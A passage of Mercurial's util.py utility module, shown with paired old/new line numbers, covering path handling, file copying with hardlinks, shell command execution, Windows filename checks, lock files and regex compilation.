1562 def log2(x):
1561 def log2(x):
1563 if not x:
1562 if not x:
1564 return 0
1563 return 0
1565 i = 0
1564 i = 0
1566 while x:
1565 while x:
1567 x >>= 1
1566 x >>= 1
1568 i += 1
1567 i += 1
1569 return i - 1
1568 return i - 1
1570
1569
1571 buf = []
1570 buf = []
1572 blen = 0
1571 blen = 0
1573 for chunk in source:
1572 for chunk in source:
1574 buf.append(chunk)
1573 buf.append(chunk)
1575 blen += len(chunk)
1574 blen += len(chunk)
1576 if blen >= min:
1575 if blen >= min:
1577 if min < max:
1576 if min < max:
1578 min = min << 1
1577 min = min << 1
1579 nmin = 1 << log2(blen)
1578 nmin = 1 << log2(blen)
1580 if nmin > min:
1579 if nmin > min:
1581 min = nmin
1580 min = nmin
1582 if min > max:
1581 if min > max:
1583 min = max
1582 min = max
1584 yield ''.join(buf)
1583 yield ''.join(buf)
1585 blen = 0
1584 blen = 0
1586 buf = []
1585 buf = []
1587 if buf:
1586 if buf:
1588 yield ''.join(buf)
1587 yield ''.join(buf)
1589
1588
1590 Abort = error.Abort
1589 Abort = error.Abort
1591
1590
1592 def always(fn):
1591 def always(fn):
1593 return True
1592 return True
1594
1593
1595 def never(fn):
1594 def never(fn):
1596 return False
1595 return False
1597
1596
1598 def nogc(func):
1597 def nogc(func):
1599 """disable garbage collector
1598 """disable garbage collector
1600
1599
1601 Python's garbage collector triggers a GC each time a certain number of
1600 Python's garbage collector triggers a GC each time a certain number of
1602 container objects (the number being defined by gc.get_threshold()) are
1601 container objects (the number being defined by gc.get_threshold()) are
1603 allocated even when marked not to be tracked by the collector. Tracking has
1602 allocated even when marked not to be tracked by the collector. Tracking has
1604 no effect on when GCs are triggered, only on what objects the GC looks
1603 no effect on when GCs are triggered, only on what objects the GC looks
1605 into. As a workaround, disable GC while building complex (huge)
1604 into. As a workaround, disable GC while building complex (huge)
1606 containers.
1605 containers.
1607
1606
1608 This garbage collector issue have been fixed in 2.7. But it still affect
1607 This garbage collector issue have been fixed in 2.7. But it still affect
1609 CPython's performance.
1608 CPython's performance.
1610 """
1609 """
1611 def wrapper(*args, **kwargs):
1610 def wrapper(*args, **kwargs):
1612 gcenabled = gc.isenabled()
1611 gcenabled = gc.isenabled()
1613 gc.disable()
1612 gc.disable()
1614 try:
1613 try:
1615 return func(*args, **kwargs)
1614 return func(*args, **kwargs)
1616 finally:
1615 finally:
1617 if gcenabled:
1616 if gcenabled:
1618 gc.enable()
1617 gc.enable()
1619 return wrapper
1618 return wrapper
1620
1619
1621 if pycompat.ispypy:
1620 if pycompat.ispypy:
1622 # PyPy runs slower with gc disabled
1621 # PyPy runs slower with gc disabled
1623 nogc = lambda x: x
1622 nogc = lambda x: x
1624
1623
1625 def pathto(root, n1, n2):
1624 def pathto(root, n1, n2):
1626 '''return the relative path from one place to another.
1625 '''return the relative path from one place to another.
1627 root should use os.sep to separate directories
1626 root should use os.sep to separate directories
1628 n1 should use os.sep to separate directories
1627 n1 should use os.sep to separate directories
1629 n2 should use "/" to separate directories
1628 n2 should use "/" to separate directories
1630 returns an os.sep-separated path.
1629 returns an os.sep-separated path.
1631
1630
1632 If n1 is a relative path, it's assumed it's
1631 If n1 is a relative path, it's assumed it's
1633 relative to root.
1632 relative to root.
1634 n2 should always be relative to root.
1633 n2 should always be relative to root.
1635 '''
1634 '''
1636 if not n1:
1635 if not n1:
1637 return localpath(n2)
1636 return localpath(n2)
1638 if os.path.isabs(n1):
1637 if os.path.isabs(n1):
1639 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1638 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1640 return os.path.join(root, localpath(n2))
1639 return os.path.join(root, localpath(n2))
1641 n2 = '/'.join((pconvert(root), n2))
1640 n2 = '/'.join((pconvert(root), n2))
1642 a, b = splitpath(n1), n2.split('/')
1641 a, b = splitpath(n1), n2.split('/')
1643 a.reverse()
1642 a.reverse()
1644 b.reverse()
1643 b.reverse()
1645 while a and b and a[-1] == b[-1]:
1644 while a and b and a[-1] == b[-1]:
1646 a.pop()
1645 a.pop()
1647 b.pop()
1646 b.pop()
1648 b.reverse()
1647 b.reverse()
1649 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1648 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1650
1649
1651 def mainfrozen():
1650 def mainfrozen():
1652 """return True if we are a frozen executable.
1651 """return True if we are a frozen executable.
1653
1652
1654 The code supports py2exe (most common, Windows only) and tools/freeze
1653 The code supports py2exe (most common, Windows only) and tools/freeze
1655 (portable, not much used).
1654 (portable, not much used).
1656 """
1655 """
1657 return (safehasattr(sys, "frozen") or # new py2exe
1656 return (safehasattr(sys, "frozen") or # new py2exe
1658 safehasattr(sys, "importers") or # old py2exe
1657 safehasattr(sys, "importers") or # old py2exe
1659 imp.is_frozen(u"__main__")) # tools/freeze
1658 imp.is_frozen(u"__main__")) # tools/freeze
1660
1659
1661 # the location of data files matching the source code
1660 # the location of data files matching the source code
1662 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1661 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1663 # executable version (py2exe) doesn't support __file__
1662 # executable version (py2exe) doesn't support __file__
1664 datapath = os.path.dirname(pycompat.sysexecutable)
1663 datapath = os.path.dirname(pycompat.sysexecutable)
1665 else:
1664 else:
1666 datapath = os.path.dirname(pycompat.fsencode(__file__))
1665 datapath = os.path.dirname(pycompat.fsencode(__file__))
1667
1666
1668 i18n.setdatapath(datapath)
1667 i18n.setdatapath(datapath)
1669
1668
1670 _hgexecutable = None
1669 _hgexecutable = None
1671
1670
1672 def hgexecutable():
1671 def hgexecutable():
1673 """return location of the 'hg' executable.
1672 """return location of the 'hg' executable.
1674
1673
1675 Defaults to $HG or 'hg' in the search path.
1674 Defaults to $HG or 'hg' in the search path.
1676 """
1675 """
1677 if _hgexecutable is None:
1676 if _hgexecutable is None:
1678 hg = encoding.environ.get('HG')
1677 hg = encoding.environ.get('HG')
1679 mainmod = sys.modules[r'__main__']
1678 mainmod = sys.modules[r'__main__']
1680 if hg:
1679 if hg:
1681 _sethgexecutable(hg)
1680 _sethgexecutable(hg)
1682 elif mainfrozen():
1681 elif mainfrozen():
1683 if getattr(sys, 'frozen', None) == 'macosx_app':
1682 if getattr(sys, 'frozen', None) == 'macosx_app':
1684 # Env variable set by py2app
1683 # Env variable set by py2app
1685 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1684 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1686 else:
1685 else:
1687 _sethgexecutable(pycompat.sysexecutable)
1686 _sethgexecutable(pycompat.sysexecutable)
1688 elif (os.path.basename(
1687 elif (os.path.basename(
1689 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1688 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1690 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1689 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1691 else:
1690 else:
1692 exe = findexe('hg') or os.path.basename(sys.argv[0])
1691 exe = findexe('hg') or os.path.basename(sys.argv[0])
1693 _sethgexecutable(exe)
1692 _sethgexecutable(exe)
1694 return _hgexecutable
1693 return _hgexecutable
1695
1694
1696 def _sethgexecutable(path):
1695 def _sethgexecutable(path):
1697 """set location of the 'hg' executable"""
1696 """set location of the 'hg' executable"""
1698 global _hgexecutable
1697 global _hgexecutable
1699 _hgexecutable = path
1698 _hgexecutable = path
1700
1699
1701 def _testfileno(f, stdf):
1700 def _testfileno(f, stdf):
1702 fileno = getattr(f, 'fileno', None)
1701 fileno = getattr(f, 'fileno', None)
1703 try:
1702 try:
1704 return fileno and fileno() == stdf.fileno()
1703 return fileno and fileno() == stdf.fileno()
1705 except io.UnsupportedOperation:
1704 except io.UnsupportedOperation:
1706 return False # fileno() raised UnsupportedOperation
1705 return False # fileno() raised UnsupportedOperation
1707
1706
1708 def isstdin(f):
1707 def isstdin(f):
1709 return _testfileno(f, sys.__stdin__)
1708 return _testfileno(f, sys.__stdin__)
1710
1709
1711 def isstdout(f):
1710 def isstdout(f):
1712 return _testfileno(f, sys.__stdout__)
1711 return _testfileno(f, sys.__stdout__)
1713
1712
1714 def shellenviron(environ=None):
1713 def shellenviron(environ=None):
1715 """return environ with optional override, useful for shelling out"""
1714 """return environ with optional override, useful for shelling out"""
1716 def py2shell(val):
1715 def py2shell(val):
1717 'convert python object into string that is useful to shell'
1716 'convert python object into string that is useful to shell'
1718 if val is None or val is False:
1717 if val is None or val is False:
1719 return '0'
1718 return '0'
1720 if val is True:
1719 if val is True:
1721 return '1'
1720 return '1'
1722 return pycompat.bytestr(val)
1721 return pycompat.bytestr(val)
1723 env = dict(encoding.environ)
1722 env = dict(encoding.environ)
1724 if environ:
1723 if environ:
1725 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1724 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1726 env['HG'] = hgexecutable()
1725 env['HG'] = hgexecutable()
1727 return env
1726 return env
1728
1727
1729 def system(cmd, environ=None, cwd=None, out=None):
1728 def system(cmd, environ=None, cwd=None, out=None):
1730 '''enhanced shell command execution.
1729 '''enhanced shell command execution.
1731 run with environment maybe modified, maybe in different dir.
1730 run with environment maybe modified, maybe in different dir.
1732
1731
1733 if out is specified, it is assumed to be a file-like object that has a
1732 if out is specified, it is assumed to be a file-like object that has a
1734 write() method. stdout and stderr will be redirected to out.'''
1733 write() method. stdout and stderr will be redirected to out.'''
1735 try:
1734 try:
1736 stdout.flush()
1735 stdout.flush()
1737 except Exception:
1736 except Exception:
1738 pass
1737 pass
1739 cmd = quotecommand(cmd)
1738 cmd = quotecommand(cmd)
1740 env = shellenviron(environ)
1739 env = shellenviron(environ)
1741 if out is None or isstdout(out):
1740 if out is None or isstdout(out):
1742 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1741 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1743 env=env, cwd=cwd)
1742 env=env, cwd=cwd)
1744 else:
1743 else:
1745 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1744 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1746 env=env, cwd=cwd, stdout=subprocess.PIPE,
1745 env=env, cwd=cwd, stdout=subprocess.PIPE,
1747 stderr=subprocess.STDOUT)
1746 stderr=subprocess.STDOUT)
1748 for line in iter(proc.stdout.readline, ''):
1747 for line in iter(proc.stdout.readline, ''):
1749 out.write(line)
1748 out.write(line)
1750 proc.wait()
1749 proc.wait()
1751 rc = proc.returncode
1750 rc = proc.returncode
1752 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1751 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1753 rc = 0
1752 rc = 0
1754 return rc
1753 return rc
1755
1754
1756 def checksignature(func):
1755 def checksignature(func):
1757 '''wrap a function with code to check for calling errors'''
1756 '''wrap a function with code to check for calling errors'''
1758 def check(*args, **kwargs):
1757 def check(*args, **kwargs):
1759 try:
1758 try:
1760 return func(*args, **kwargs)
1759 return func(*args, **kwargs)
1761 except TypeError:
1760 except TypeError:
1762 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1761 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1763 raise error.SignatureError
1762 raise error.SignatureError
1764 raise
1763 raise
1765
1764
1766 return check
1765 return check
1767
1766
1768 # a whilelist of known filesystems where hardlink works reliably
1767 # a whilelist of known filesystems where hardlink works reliably
1769 _hardlinkfswhitelist = {
1768 _hardlinkfswhitelist = {
1770 'btrfs',
1769 'btrfs',
1771 'ext2',
1770 'ext2',
1772 'ext3',
1771 'ext3',
1773 'ext4',
1772 'ext4',
1774 'hfs',
1773 'hfs',
1775 'jfs',
1774 'jfs',
1776 'NTFS',
1775 'NTFS',
1777 'reiserfs',
1776 'reiserfs',
1778 'tmpfs',
1777 'tmpfs',
1779 'ufs',
1778 'ufs',
1780 'xfs',
1779 'xfs',
1781 'zfs',
1780 'zfs',
1782 }
1781 }
1783
1782
1784 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1783 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1785 '''copy a file, preserving mode and optionally other stat info like
1784 '''copy a file, preserving mode and optionally other stat info like
1786 atime/mtime
1785 atime/mtime
1787
1786
1788 checkambig argument is used with filestat, and is useful only if
1787 checkambig argument is used with filestat, and is useful only if
1789 destination file is guarded by any lock (e.g. repo.lock or
1788 destination file is guarded by any lock (e.g. repo.lock or
1790 repo.wlock).
1789 repo.wlock).
1791
1790
1792 copystat and checkambig should be exclusive.
1791 copystat and checkambig should be exclusive.
1793 '''
1792 '''
1794 assert not (copystat and checkambig)
1793 assert not (copystat and checkambig)
1795 oldstat = None
1794 oldstat = None
1796 if os.path.lexists(dest):
1795 if os.path.lexists(dest):
1797 if checkambig:
1796 if checkambig:
1798 oldstat = checkambig and filestat.frompath(dest)
1797 oldstat = checkambig and filestat.frompath(dest)
1799 unlink(dest)
1798 unlink(dest)
1800 if hardlink:
1799 if hardlink:
1801 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1800 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1802 # unless we are confident that dest is on a whitelisted filesystem.
1801 # unless we are confident that dest is on a whitelisted filesystem.
1803 try:
1802 try:
1804 fstype = getfstype(os.path.dirname(dest))
1803 fstype = getfstype(os.path.dirname(dest))
1805 except OSError:
1804 except OSError:
1806 fstype = None
1805 fstype = None
1807 if fstype not in _hardlinkfswhitelist:
1806 if fstype not in _hardlinkfswhitelist:
1808 hardlink = False
1807 hardlink = False
1809 if hardlink:
1808 if hardlink:
1810 try:
1809 try:
1811 oslink(src, dest)
1810 oslink(src, dest)
1812 return
1811 return
1813 except (IOError, OSError):
1812 except (IOError, OSError):
1814 pass # fall back to normal copy
1813 pass # fall back to normal copy
1815 if os.path.islink(src):
1814 if os.path.islink(src):
1816 os.symlink(os.readlink(src), dest)
1815 os.symlink(os.readlink(src), dest)
1817 # copytime is ignored for symlinks, but in general copytime isn't needed
1816 # copytime is ignored for symlinks, but in general copytime isn't needed
1818 # for them anyway
1817 # for them anyway
1819 else:
1818 else:
1820 try:
1819 try:
1821 shutil.copyfile(src, dest)
1820 shutil.copyfile(src, dest)
1822 if copystat:
1821 if copystat:
1823 # copystat also copies mode
1822 # copystat also copies mode
1824 shutil.copystat(src, dest)
1823 shutil.copystat(src, dest)
1825 else:
1824 else:
1826 shutil.copymode(src, dest)
1825 shutil.copymode(src, dest)
1827 if oldstat and oldstat.stat:
1826 if oldstat and oldstat.stat:
1828 newstat = filestat.frompath(dest)
1827 newstat = filestat.frompath(dest)
1829 if newstat.isambig(oldstat):
1828 if newstat.isambig(oldstat):
1830 # stat of copied file is ambiguous to original one
1829 # stat of copied file is ambiguous to original one
1831 advanced = (
1830 advanced = (
1832 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1831 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1833 os.utime(dest, (advanced, advanced))
1832 os.utime(dest, (advanced, advanced))
1834 except shutil.Error as inst:
1833 except shutil.Error as inst:
1835 raise Abort(str(inst))
1834 raise Abort(str(inst))
1836
1835
1837 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1836 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1838 """Copy a directory tree using hardlinks if possible."""
1837 """Copy a directory tree using hardlinks if possible."""
1839 num = 0
1838 num = 0
1840
1839
1841 gettopic = lambda: hardlink and _('linking') or _('copying')
1840 gettopic = lambda: hardlink and _('linking') or _('copying')
1842
1841
1843 if os.path.isdir(src):
1842 if os.path.isdir(src):
1844 if hardlink is None:
1843 if hardlink is None:
1845 hardlink = (os.stat(src).st_dev ==
1844 hardlink = (os.stat(src).st_dev ==
1846 os.stat(os.path.dirname(dst)).st_dev)
1845 os.stat(os.path.dirname(dst)).st_dev)
1847 topic = gettopic()
1846 topic = gettopic()
1848 os.mkdir(dst)
1847 os.mkdir(dst)
1849 for name, kind in listdir(src):
1848 for name, kind in listdir(src):
1850 srcname = os.path.join(src, name)
1849 srcname = os.path.join(src, name)
1851 dstname = os.path.join(dst, name)
1850 dstname = os.path.join(dst, name)
1852 def nprog(t, pos):
1851 def nprog(t, pos):
1853 if pos is not None:
1852 if pos is not None:
1854 return progress(t, pos + num)
1853 return progress(t, pos + num)
1855 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1854 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1856 num += n
1855 num += n
1857 else:
1856 else:
1858 if hardlink is None:
1857 if hardlink is None:
1859 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1858 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1860 os.stat(os.path.dirname(dst)).st_dev)
1859 os.stat(os.path.dirname(dst)).st_dev)
1861 topic = gettopic()
1860 topic = gettopic()
1862
1861
1863 if hardlink:
1862 if hardlink:
1864 try:
1863 try:
1865 oslink(src, dst)
1864 oslink(src, dst)
1866 except (IOError, OSError):
1865 except (IOError, OSError):
1867 hardlink = False
1866 hardlink = False
1868 shutil.copy(src, dst)
1867 shutil.copy(src, dst)
1869 else:
1868 else:
1870 shutil.copy(src, dst)
1869 shutil.copy(src, dst)
1871 num += 1
1870 num += 1
1872 progress(topic, num)
1871 progress(topic, num)
1873 progress(topic, None)
1872 progress(topic, None)
1874
1873
1875 return hardlink, num
1874 return hardlink, num
1876
1875
1877 _winreservednames = {
1876 _winreservednames = {
1878 'con', 'prn', 'aux', 'nul',
1877 'con', 'prn', 'aux', 'nul',
1879 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1878 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1880 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1879 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1881 }
1880 }
1882 _winreservedchars = ':*?"<>|'
1881 _winreservedchars = ':*?"<>|'
1883 def checkwinfilename(path):
1882 def checkwinfilename(path):
1884 r'''Check that the base-relative path is a valid filename on Windows.
1883 r'''Check that the base-relative path is a valid filename on Windows.
1885 Returns None if the path is ok, or a UI string describing the problem.
1884 Returns None if the path is ok, or a UI string describing the problem.
1886
1885
1887 >>> checkwinfilename(b"just/a/normal/path")
1886 >>> checkwinfilename(b"just/a/normal/path")
1888 >>> checkwinfilename(b"foo/bar/con.xml")
1887 >>> checkwinfilename(b"foo/bar/con.xml")
1889 "filename contains 'con', which is reserved on Windows"
1888 "filename contains 'con', which is reserved on Windows"
1890 >>> checkwinfilename(b"foo/con.xml/bar")
1889 >>> checkwinfilename(b"foo/con.xml/bar")
1891 "filename contains 'con', which is reserved on Windows"
1890 "filename contains 'con', which is reserved on Windows"
1892 >>> checkwinfilename(b"foo/bar/xml.con")
1891 >>> checkwinfilename(b"foo/bar/xml.con")
1893 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1892 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1894 "filename contains 'AUX', which is reserved on Windows"
1893 "filename contains 'AUX', which is reserved on Windows"
1895 >>> checkwinfilename(b"foo/bar/bla:.txt")
1894 >>> checkwinfilename(b"foo/bar/bla:.txt")
1896 "filename contains ':', which is reserved on Windows"
1895 "filename contains ':', which is reserved on Windows"
1897 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1896 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1898 "filename contains '\\x07', which is invalid on Windows"
1897 "filename contains '\\x07', which is invalid on Windows"
1899 >>> checkwinfilename(b"foo/bar/bla ")
1898 >>> checkwinfilename(b"foo/bar/bla ")
1900 "filename ends with ' ', which is not allowed on Windows"
1899 "filename ends with ' ', which is not allowed on Windows"
1901 >>> checkwinfilename(b"../bar")
1900 >>> checkwinfilename(b"../bar")
1902 >>> checkwinfilename(b"foo\\")
1901 >>> checkwinfilename(b"foo\\")
1903 "filename ends with '\\', which is invalid on Windows"
1902 "filename ends with '\\', which is invalid on Windows"
1904 >>> checkwinfilename(b"foo\\/bar")
1903 >>> checkwinfilename(b"foo\\/bar")
1905 "directory name ends with '\\', which is invalid on Windows"
1904 "directory name ends with '\\', which is invalid on Windows"
1906 '''
1905 '''
1907 if path.endswith('\\'):
1906 if path.endswith('\\'):
1908 return _("filename ends with '\\', which is invalid on Windows")
1907 return _("filename ends with '\\', which is invalid on Windows")
1909 if '\\/' in path:
1908 if '\\/' in path:
1910 return _("directory name ends with '\\', which is invalid on Windows")
1909 return _("directory name ends with '\\', which is invalid on Windows")
1911 for n in path.replace('\\', '/').split('/'):
1910 for n in path.replace('\\', '/').split('/'):
1912 if not n:
1911 if not n:
1913 continue
1912 continue
1914 for c in _filenamebytestr(n):
1913 for c in _filenamebytestr(n):
1915 if c in _winreservedchars:
1914 if c in _winreservedchars:
1916 return _("filename contains '%s', which is reserved "
1915 return _("filename contains '%s', which is reserved "
1917 "on Windows") % c
1916 "on Windows") % c
1918 if ord(c) <= 31:
1917 if ord(c) <= 31:
1919 return _("filename contains '%s', which is invalid "
1918 return _("filename contains '%s', which is invalid "
1920 "on Windows") % stringutil.escapestr(c)
1919 "on Windows") % stringutil.escapestr(c)
1921 base = n.split('.')[0]
1920 base = n.split('.')[0]
1922 if base and base.lower() in _winreservednames:
1921 if base and base.lower() in _winreservednames:
1923 return _("filename contains '%s', which is reserved "
1922 return _("filename contains '%s', which is reserved "
1924 "on Windows") % base
1923 "on Windows") % base
1925 t = n[-1:]
1924 t = n[-1:]
1926 if t in '. ' and n not in '..':
1925 if t in '. ' and n not in '..':
1927 return _("filename ends with '%s', which is not allowed "
1926 return _("filename ends with '%s', which is not allowed "
1928 "on Windows") % t
1927 "on Windows") % t
1929
1928
1930 if pycompat.iswindows:
1929 if pycompat.iswindows:
1931 checkosfilename = checkwinfilename
1930 checkosfilename = checkwinfilename
1932 timer = time.clock
1931 timer = time.clock
1933 else:
1932 else:
1934 checkosfilename = platform.checkosfilename
1933 checkosfilename = platform.checkosfilename
1935 timer = time.time
1934 timer = time.time
1936
1935
1937 if safehasattr(time, "perf_counter"):
1936 if safehasattr(time, "perf_counter"):
1938 timer = time.perf_counter
1937 timer = time.perf_counter
1939
1938
1940 def makelock(info, pathname):
1939 def makelock(info, pathname):
1941 """Create a lock file atomically if possible
1940 """Create a lock file atomically if possible
1942
1941
1943 This may leave a stale lock file if symlink isn't supported and signal
1942 This may leave a stale lock file if symlink isn't supported and signal
1944 interrupt is enabled.
1943 interrupt is enabled.
1945 """
1944 """
1946 try:
1945 try:
1947 return os.symlink(info, pathname)
1946 return os.symlink(info, pathname)
1948 except OSError as why:
1947 except OSError as why:
1949 if why.errno == errno.EEXIST:
1948 if why.errno == errno.EEXIST:
1950 raise
1949 raise
1951 except AttributeError: # no symlink in os
1950 except AttributeError: # no symlink in os
1952 pass
1951 pass
1953
1952
1954 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1953 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1955 ld = os.open(pathname, flags)
1954 ld = os.open(pathname, flags)
1956 os.write(ld, info)
1955 os.write(ld, info)
1957 os.close(ld)
1956 os.close(ld)
1958
1957
1959 def readlock(pathname):
1958 def readlock(pathname):
1960 try:
1959 try:
1961 return os.readlink(pathname)
1960 return os.readlink(pathname)
1962 except OSError as why:
1961 except OSError as why:
1963 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1962 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1964 raise
1963 raise
1965 except AttributeError: # no symlink in os
1964 except AttributeError: # no symlink in os
1966 pass
1965 pass
1967 fp = posixfile(pathname, 'rb')
1966 fp = posixfile(pathname, 'rb')
1968 r = fp.read()
1967 r = fp.read()
1969 fp.close()
1968 fp.close()
1970 return r
1969 return r
1971
1970
1972 def fstat(fp):
1971 def fstat(fp):
1973 '''stat file object that may not have fileno method.'''
1972 '''stat file object that may not have fileno method.'''
1974 try:
1973 try:
1975 return os.fstat(fp.fileno())
1974 return os.fstat(fp.fileno())
1976 except AttributeError:
1975 except AttributeError:
1977 return os.stat(fp.name)
1976 return os.stat(fp.name)
1978
1977
1979 # File system features
1978 # File system features
1980
1979
1981 def fscasesensitive(path):
1980 def fscasesensitive(path):
1982 """
1981 """
1983 Return true if the given path is on a case-sensitive filesystem
1982 Return true if the given path is on a case-sensitive filesystem
1984
1983
1985 Requires a path (like /foo/.hg) ending with a foldable final
1984 Requires a path (like /foo/.hg) ending with a foldable final
1986 directory component.
1985 directory component.
1987 """
1986 """
1988 s1 = os.lstat(path)
1987 s1 = os.lstat(path)
1989 d, b = os.path.split(path)
1988 d, b = os.path.split(path)
1990 b2 = b.upper()
1989 b2 = b.upper()
1991 if b == b2:
1990 if b == b2:
1992 b2 = b.lower()
1991 b2 = b.lower()
1993 if b == b2:
1992 if b == b2:
1994 return True # no evidence against case sensitivity
1993 return True # no evidence against case sensitivity
1995 p2 = os.path.join(d, b2)
1994 p2 = os.path.join(d, b2)
1996 try:
1995 try:
1997 s2 = os.lstat(p2)
1996 s2 = os.lstat(p2)
1998 if s2 == s1:
1997 if s2 == s1:
1999 return False
1998 return False
2000 return True
1999 return True
2001 except OSError:
2000 except OSError:
2002 return True
2001 return True
2003
2002
2004 try:
2003 try:
2005 import re2
2004 import re2
2006 _re2 = None
2005 _re2 = None
2007 except ImportError:
2006 except ImportError:
2008 _re2 = False
2007 _re2 = False
2009
2008
2010 class _re(object):
2009 class _re(object):
2011 def _checkre2(self):
2010 def _checkre2(self):
2012 global _re2
2011 global _re2
2013 try:
2012 try:
2014 # check if match works, see issue3964
2013 # check if match works, see issue3964
2015 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2014 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2016 except ImportError:
2015 except ImportError:
2017 _re2 = False
2016 _re2 = False
2018
2017
2019 def compile(self, pat, flags=0):
2018 def compile(self, pat, flags=0):
2020 '''Compile a regular expression, using re2 if possible
2019 '''Compile a regular expression, using re2 if possible
2021
2020
2022 For best performance, use only re2-compatible regexp features. The
2021 For best performance, use only re2-compatible regexp features. The
2023 only flags from the re module that are re2-compatible are
2022 only flags from the re module that are re2-compatible are
2024 IGNORECASE and MULTILINE.'''
2023 IGNORECASE and MULTILINE.'''
2025 if _re2 is None:
2024 if _re2 is None:
2026 self._checkre2()
2025 self._checkre2()
2027 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2026 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2028 if flags & remod.IGNORECASE:
2027 if flags & remod.IGNORECASE:
2029 pat = '(?i)' + pat
2028 pat = '(?i)' + pat
2030 if flags & remod.MULTILINE:
2029 if flags & remod.MULTILINE:
2031 pat = '(?m)' + pat
2030 pat = '(?m)' + pat
2032 try:
2031 try:
2033 return re2.compile(pat)
2032 return re2.compile(pat)
2034 except re2.error:
2033 except re2.error:
2035 pass
2034 pass
2036 return remod.compile(pat, flags)
2035 return remod.compile(pat, flags)
2037
2036
2038 @propertycache
2037 @propertycache
2039 def escape(self):
2038 def escape(self):
2040 '''Return the version of escape corresponding to self.compile.
2039 '''Return the version of escape corresponding to self.compile.
2041
2040
2042 This is imperfect because whether re2 or re is used for a particular
2041 This is imperfect because whether re2 or re is used for a particular
2043 function depends on the flags, etc, but it's the best we can do.
2042 function depends on the flags, etc, but it's the best we can do.
2044 '''
2043 '''
2045 global _re2
2044 global _re2
2046 if _re2 is None:
2045 if _re2 is None:
2047 self._checkre2()
2046 self._checkre2()
2048 if _re2:
2047 if _re2:
2049 return re2.escape
2048 return re2.escape
2050 else:
2049 else:
2051 return remod.escape
2050 return remod.escape
2052
2051
2053 re = _re()
2052 re = _re()
2054
2053
2055 _fspathcache = {}
2054 _fspathcache = {}
2056 def fspath(name, root):
2055 def fspath(name, root):
2057 '''Get name in the case stored in the filesystem
2056 '''Get name in the case stored in the filesystem
2058
2057
2059 The name should be relative to root, and be normcase-ed for efficiency.
2058 The name should be relative to root, and be normcase-ed for efficiency.
2060
2059
2061 Note that this function is unnecessary, and should not be
2060 Note that this function is unnecessary, and should not be
2062 called, for case-sensitive filesystems (simply because it's expensive).
2061 called, for case-sensitive filesystems (simply because it's expensive).
2063
2062
2064 The root should be normcase-ed, too.
2063 The root should be normcase-ed, too.
2065 '''
2064 '''
2066 def _makefspathcacheentry(dir):
2065 def _makefspathcacheentry(dir):
2067 return dict((normcase(n), n) for n in os.listdir(dir))
2066 return dict((normcase(n), n) for n in os.listdir(dir))
2068
2067
2069 seps = pycompat.ossep
2068 seps = pycompat.ossep
2070 if pycompat.osaltsep:
2069 if pycompat.osaltsep:
2071 seps = seps + pycompat.osaltsep
2070 seps = seps + pycompat.osaltsep
2072 # Protect backslashes. This gets silly very quickly.
2071 # Protect backslashes. This gets silly very quickly.
2073 seps.replace('\\','\\\\')
2072 seps.replace('\\','\\\\')
2074 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2073 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2075 dir = os.path.normpath(root)
2074 dir = os.path.normpath(root)
2076 result = []
2075 result = []
2077 for part, sep in pattern.findall(name):
2076 for part, sep in pattern.findall(name):
2078 if sep:
2077 if sep:
2079 result.append(sep)
2078 result.append(sep)
2080 continue
2079 continue
2081
2080
2082 if dir not in _fspathcache:
2081 if dir not in _fspathcache:
